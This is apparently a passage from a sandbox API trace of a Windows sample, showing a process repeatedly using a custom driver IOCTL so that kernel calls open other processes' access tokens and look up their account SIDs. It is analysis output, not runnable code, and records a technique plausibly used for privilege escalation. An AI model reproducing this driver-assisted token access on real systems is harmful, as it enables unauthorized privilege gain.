ObjectType=0x0, AccessMode=0x1, Object=0xfffff88002aab668, HandleInformation=0x0 | out: Object=0xfffff88002aab668*=0xfffffa8001edd630, HandleInformation=0x0) returned 0x0 [0184.866] ObOpenObjectByPointer (in: Object=0xfffffa8001edd630, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff88002aab670 | out: Handle=0xfffff88002aab670*=0xffffffff80000768) returned 0x0 [0184.866] ObfDereferenceObject (Object=0xfffffa8001edd630) returned 0x14 [0184.866] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000768, DesiredAccess=0x8, TokenHandle=0xfffffa80020ab4c0 | out: TokenHandle=0xfffffa80020ab4c0*=0xc0) returned 0x0 [0184.866] ZwClose (Handle=0xffffffff80000768) returned 0x0 [0184.867] IofCompleteRequest (Irp=0xfffffa80034bd890, PriorityBoost=0) [0184.867] GetTokenInformation (in: TokenHandle=0xc0, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0184.867] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0184.869] CloseHandle (hObject=0xc0) returned 1 [0184.869] CloseHandle (hObject=0xc4) returned 1 [0184.869] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x704) returned 0xc4 [0184.869] DeviceIoControl (in: hDevice=0x78, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0184.869] ObReferenceObjectByHandle (in: Handle=0xc4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff88002aab668, HandleInformation=0x0 | out: Object=0xfffff88002aab668*=0xfffffa8001ee8b30, HandleInformation=0x0) returned 0x0 [0184.870] ObOpenObjectByPointer (in: Object=0xfffffa8001ee8b30, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff88002aab670 | out: Handle=0xfffff88002aab670*=0xffffffff80000768) returned 0x0 [0184.870] ObfDereferenceObject (Object=0xfffffa8001ee8b30) returned 0x14 [0184.870] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000768, DesiredAccess=0x8, TokenHandle=0xfffffa80020ab4c0 | out: TokenHandle=0xfffffa80020ab4c0*=0xc0) returned 0x0 [0184.870] ZwClose (Handle=0xffffffff80000768) returned 0x0 [0184.870] IofCompleteRequest (Irp=0xfffffa80034bd890, PriorityBoost=0) [0184.870] GetTokenInformation (in: TokenHandle=0xc0, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0184.870] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0184.873] CloseHandle (hObject=0xc0) returned 1 [0184.873] CloseHandle (hObject=0xc4) returned 1 [0184.873] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x694) returned 0xc4 [0184.873] DeviceIoControl (in: hDevice=0x78, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0184.873] ObReferenceObjectByHandle (in: Handle=0xc4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff88002aab668, HandleInformation=0x0 | out: Object=0xfffff88002aab668*=0xfffffa8001f45b30, HandleInformation=0x0) returned 0x0 [0184.873] ObOpenObjectByPointer (in: Object=0xfffffa8001f45b30, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff88002aab670 | out: Handle=0xfffff88002aab670*=0xffffffff80000768) returned 0x0 [0184.873] ObfDereferenceObject (Object=0xfffffa8001f45b30) returned 0x14 [0184.873] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000768, DesiredAccess=0x8, TokenHandle=0xfffffa80020ab4c0 | out: TokenHandle=0xfffffa80020ab4c0*=0xc0) returned 0x0 [0184.873] ZwClose (Handle=0xffffffff80000768) returned 0x0 [0184.873] IofCompleteRequest (Irp=0xfffffa80034bd890, PriorityBoost=0) [0184.874] GetTokenInformation (in: TokenHandle=0xc0, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0184.874] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0184.876] CloseHandle (hObject=0xc0) returned 1 [0184.876] CloseHandle (hObject=0xc4) returned 1 [0184.876] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x734) returned 0xc4 [0184.876] DeviceIoControl (in: hDevice=0x78, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0184.876] ObReferenceObjectByHandle (in: Handle=0xc4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff88002aab668, HandleInformation=0x0 | out: Object=0xfffff88002aab668*=0xfffffa8001f99b30, HandleInformation=0x0) returned 0x0 [0184.876] ObOpenObjectByPointer (in: Object=0xfffffa8001f99b30, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff88002aab670 | out: Handle=0xfffff88002aab670*=0xffffffff80000768) returned 0x0 [0184.876] ObfDereferenceObject (Object=0xfffffa8001f99b30) returned 0x14 [0184.877] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000768, DesiredAccess=0x8, TokenHandle=0xfffffa80020ab4c0 | out: TokenHandle=0xfffffa80020ab4c0*=0xc0) returned 0x0 [0184.877] ZwClose (Handle=0xffffffff80000768) returned 0x0 [0184.877] IofCompleteRequest (Irp=0xfffffa80034bd890, PriorityBoost=0) [0184.877] GetTokenInformation (in: TokenHandle=0xc0, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0184.877] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0184.879] CloseHandle (hObject=0xc0) returned 1 [0184.879] CloseHandle (hObject=0xc4) returned 1 [0184.879] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x688) returned 0xc4 [0184.880] DeviceIoControl (in: hDevice=0x78, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0184.880] ObReferenceObjectByHandle (in: Handle=0xc4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff88002aab668, HandleInformation=0x0 | out: Object=0xfffff88002aab668*=0xfffffa800ea389f0, HandleInformation=0x0) returned 0x0 [0184.880] ObOpenObjectByPointer (in: Object=0xfffffa800ea389f0, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff88002aab670 | out: Handle=0xfffff88002aab670*=0xffffffff80000768) returned 0x0 [0184.880] ObfDereferenceObject (Object=0xfffffa800ea389f0) returned 0x14 [0184.880] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000768, DesiredAccess=0x8, TokenHandle=0xfffffa80020ab4c0 | out: TokenHandle=0xfffffa80020ab4c0*=0xc0) returned 0x0 [0184.880] ZwClose (Handle=0xffffffff80000768) returned 0x0 [0184.880] IofCompleteRequest (Irp=0xfffffa80034bd890, PriorityBoost=0) [0184.880] GetTokenInformation (in: TokenHandle=0xc0, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0184.880] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0184.882] CloseHandle (hObject=0xc0) returned 1 [0184.882] CloseHandle (hObject=0xc4) returned 1 [0184.882] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x414) returned 0xc4 [0184.882] DeviceIoControl (in: hDevice=0x78, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0184.882] ObReferenceObjectByHandle (in: Handle=0xc4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff88002aab668, HandleInformation=0x0 | out: Object=0xfffff88002aab668*=0xfffffa8001f52310, HandleInformation=0x0) returned 0x0 [0184.882] ObOpenObjectByPointer (in: Object=0xfffffa8001f52310, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff88002aab670 | out: Handle=0xfffff88002aab670*=0xffffffff80000768) returned 0x0 [0184.882] ObfDereferenceObject (Object=0xfffffa8001f52310) returned 0x14 [0184.882] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000768, DesiredAccess=0x8, TokenHandle=0xfffffa80020ab4c0 | out: TokenHandle=0xfffffa80020ab4c0*=0xc0) returned 0x0 [0184.883] ZwClose (Handle=0xffffffff80000768) returned 0x0 [0184.883] IofCompleteRequest (Irp=0xfffffa80034bd890, PriorityBoost=0) [0184.883] GetTokenInformation (in: TokenHandle=0xc0, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0184.883] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0184.885] CloseHandle (hObject=0xc0) returned 1 [0184.885] CloseHandle (hObject=0xc4) returned 1 [0184.885] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x90) returned 0xc4 [0184.885] DeviceIoControl (in: hDevice=0x78, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0184.885] ObReferenceObjectByHandle (in: Handle=0xc4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff88002aab668, HandleInformation=0x0 | out: Object=0xfffff88002aab668*=0xfffffa8001f6c060, HandleInformation=0x0) returned 0x0 [0184.885] ObOpenObjectByPointer (in: Object=0xfffffa8001f6c060, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff88002aab670 | out: Handle=0xfffff88002aab670*=0xffffffff80000768) returned 0x0 [0184.885] ObfDereferenceObject (Object=0xfffffa8001f6c060) returned 0x14 [0184.885] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000768, DesiredAccess=0x8, TokenHandle=0xfffffa80020ab4c0 | out: TokenHandle=0xfffffa80020ab4c0*=0xc0) returned 0x0 [0184.885] ZwClose (Handle=0xffffffff80000768) returned 0x0 [0184.885] IofCompleteRequest (Irp=0xfffffa80034bd890, PriorityBoost=0) [0184.885] GetTokenInformation (in: TokenHandle=0xc0, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0184.885] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0184.887] CloseHandle (hObject=0xc0) returned 1 [0184.887] CloseHandle (hObject=0xc4) returned 1 [0184.887] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x780) returned 0xc4 [0184.887] DeviceIoControl (in: hDevice=0x78, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0184.887] ObReferenceObjectByHandle (in: Handle=0xc4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff88002aab668, HandleInformation=0x0 | out: Object=0xfffff88002aab668*=0xfffffa8001fc2b30, HandleInformation=0x0) returned 0x0 [0184.887] ObOpenObjectByPointer (in: Object=0xfffffa8001fc2b30, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff88002aab670 | out: Handle=0xfffff88002aab670*=0xffffffff80000768) returned 0x0 [0184.887] ObfDereferenceObject (Object=0xfffffa8001fc2b30) returned 0x14 [0184.887] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000768, DesiredAccess=0x8, TokenHandle=0xfffffa80020ab4c0 | out: TokenHandle=0xfffffa80020ab4c0*=0xc0) returned 0x0 [0184.888] ZwClose (Handle=0xffffffff80000768) returned 0x0 [0184.888] IofCompleteRequest (Irp=0xfffffa80034bd890, PriorityBoost=0) [0184.888] GetTokenInformation (in: TokenHandle=0xc0, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0184.888] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0184.890] CloseHandle (hObject=0xc0) returned 1 [0184.890] CloseHandle (hObject=0xc4) returned 1 [0184.890] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x208) returned 0xc4 [0184.890] DeviceIoControl (in: hDevice=0x78, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0184.890] ObReferenceObjectByHandle (in: Handle=0xc4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff88002aab668, HandleInformation=0x0 | out: Object=0xfffff88002aab668*=0xfffffa800201ea90, HandleInformation=0x0) returned 0x0 [0184.890] ObOpenObjectByPointer (in: Object=0xfffffa800201ea90, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff88002aab670 | out: Handle=0xfffff88002aab670*=0xffffffff80000768) returned 0x0 [0184.890] ObfDereferenceObject (Object=0xfffffa800201ea90) returned 0x14 [0184.890] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000768, DesiredAccess=0x8, TokenHandle=0xfffffa80020ab4c0 | out: TokenHandle=0xfffffa80020ab4c0*=0xc0) returned 0x0 [0184.890] ZwClose (Handle=0xffffffff80000768) returned 0x0 [0184.891] IofCompleteRequest (Irp=0xfffffa80034bd890, PriorityBoost=0) [0184.891] GetTokenInformation (in: TokenHandle=0xc0, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0184.891] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0184.892] CloseHandle (hObject=0xc0) returned 1 [0184.893] CloseHandle (hObject=0xc4) returned 1 [0184.893] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5d4) returned 0xc4 [0184.893] DeviceIoControl (in: hDevice=0x78, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0184.893] ObReferenceObjectByHandle (in: Handle=0xc4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff88002aab668, HandleInformation=0x0 | out: Object=0xfffff88002aab668*=0xfffffa8002038b30, HandleInformation=0x0) returned 0x0 [0184.893] ObOpenObjectByPointer (in: Object=0xfffffa8002038b30, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff88002aab670 | out: Handle=0xfffff88002aab670*=0xffffffff80000768) returned 0x0 [0184.893] ObfDereferenceObject (Object=0xfffffa8002038b30) returned 0x14 [0184.893] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000768, DesiredAccess=0x8, TokenHandle=0xfffffa80020ab4c0 | out: TokenHandle=0xfffffa80020ab4c0*=0xc0) returned 0x0 [0184.893] ZwClose (Handle=0xffffffff80000768) returned 0x0 [0184.893] IofCompleteRequest (Irp=0xfffffa80034bd890, PriorityBoost=0) [0184.893] GetTokenInformation (in: TokenHandle=0xc0, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0184.893] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0184.895] CloseHandle (hObject=0xc0) returned 1 [0184.895] CloseHandle (hObject=0xc4) returned 1 [0184.895] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x36c) returned 0xc4 [0184.895] DeviceIoControl (in: hDevice=0x78, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0184.895] ObReferenceObjectByHandle (in: Handle=0xc4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff88002aab668, HandleInformation=0x0 | out: Object=0xfffff88002aab668*=0xfffffa8002046060, HandleInformation=0x0) returned 0x0 [0184.895] ObOpenObjectByPointer (in: Object=0xfffffa8002046060, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff88002aab670 | out: Handle=0xfffff88002aab670*=0xffffffff80000768) returned 0x0 [0184.895] ObfDereferenceObject (Object=0xfffffa8002046060) returned 0x14 [0184.895] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000768, DesiredAccess=0x8, TokenHandle=0xfffffa80020ab4c0 | out: TokenHandle=0xfffffa80020ab4c0*=0xc0) returned 0x0 [0184.896] ZwClose (Handle=0xffffffff80000768) returned 0x0 [0184.896] IofCompleteRequest (Irp=0xfffffa80034bd890, PriorityBoost=0) [0184.896] GetTokenInformation (in: TokenHandle=0xc0, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0184.896] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0184.897] CloseHandle (hObject=0xc0) returned 1 [0184.897] CloseHandle (hObject=0xc4) returned 1 [0184.897] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x51c) returned 0xc4 [0184.898] DeviceIoControl (in: hDevice=0x78, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0184.898] ObReferenceObjectByHandle (in: Handle=0xc4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff88002aab668, HandleInformation=0x0 | out: Object=0xfffff88002aab668*=0xfffffa800205e5f0, HandleInformation=0x0) returned 0x0 [0184.898] ObOpenObjectByPointer (in: Object=0xfffffa800205e5f0, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff88002aab670 | out: Handle=0xfffff88002aab670*=0xffffffff80000768) returned 0x0 [0184.898] ObfDereferenceObject (Object=0xfffffa800205e5f0) returned 0x14 [0184.898] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000768, DesiredAccess=0x8, TokenHandle=0xfffffa80020ab4c0 | out: TokenHandle=0xfffffa80020ab4c0*=0xc0) returned 0x0 [0184.898] ZwClose (Handle=0xffffffff80000768) returned 0x0 [0184.898] IofCompleteRequest (Irp=0xfffffa80034bd890, PriorityBoost=0) [0184.898] GetTokenInformation (in: TokenHandle=0xc0, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0184.898] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0184.900] CloseHandle (hObject=0xc0) returned 1 [0184.900] CloseHandle (hObject=0xc4) returned 1 [0184.900] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7fc) returned 0xc4 [0184.900] DeviceIoControl (in: hDevice=0x78, 